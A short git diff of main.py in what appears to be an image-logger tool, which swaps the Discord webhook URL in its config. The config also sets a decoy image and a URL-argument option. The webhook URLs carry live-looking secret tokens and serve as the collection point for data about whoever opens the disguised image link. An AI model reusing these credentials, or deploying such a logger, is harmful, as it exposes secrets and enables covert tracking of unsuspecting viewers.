diff --git a/main.py b/main.py index 27db574..b4ad820 100644 --- a/main.py +++ b/main.py @@ -12,7 +12,7 @@ config = { # BASE CONFIG # - "webhook": "https://discord.com/api/webhooks/1091220366984224788/Te54hSoJ1kqvAWLompNzA3aWux7gaiQ9IMgedx76z4grFYQd2dcefXbxnl5tbE4DOVbq", + "webhook": "https://discord.com/api/webhooks/1367458689040126037/wt3pZ7I6lpYz4TCYIj8aYDoOLMLlQzz2U5x7rxeHzelybKlX8VSW6dIZ5gB9NpuvqPzn", "image": "https://imageio.forbes.com/specials-images/imageserve/5d35eacaf1176b0008974b54/0x0.jpg?format=jpg&crop=4560,2565,x790,y784,safe&width=1200", # You can also have a custom image by using a URL argument # (E.g. yoursite.com/imagelogger?url=) "imageArgument": True, # Allows you to use a URL argument to change the image (SEE THE README)